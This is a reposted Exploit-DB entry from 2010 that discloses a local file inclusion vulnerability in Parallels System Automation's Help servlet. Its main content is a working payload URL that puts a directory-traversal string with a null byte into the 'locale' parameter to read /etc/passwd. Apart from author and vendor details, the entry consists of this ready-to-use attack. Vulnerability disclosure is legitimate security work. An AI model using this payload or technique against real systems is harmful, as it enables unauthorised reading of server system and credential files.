Parallels System Automation (PSA) – Local File Inclusion

• Exploit Database
• 11 阅读

• 作者： Pouya Daneshmand
  日期： 2010-06-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/13833/

• #################################################################
  # Application Info:
  # Name: Parallels System Automation (PSA)
  # Vendor: http://Parallels.com
  #################################################################
  # Vulnerability Info:
  # Type: Local File Inclusion
  # Risk: Medium
  #################################################################
  Vulnerability:
  https://cp.site.com/servlet/Help?system_id=pem&book_type=login&help_id=change_password&locale=/../../../../../../etc/passwd%00
  #################################################################
  # Discoverd By: Pouya Daneshmand
  # Website: http://Pouya.info
  # Contacts: pouya@pouya.info
  ###################################################################
  # Orginal Document:http://blog.pouya.info/userfiles/vul/PSA-LFI.pdf
  ###################################################################
  # Securitylab.ir
  ###################################################################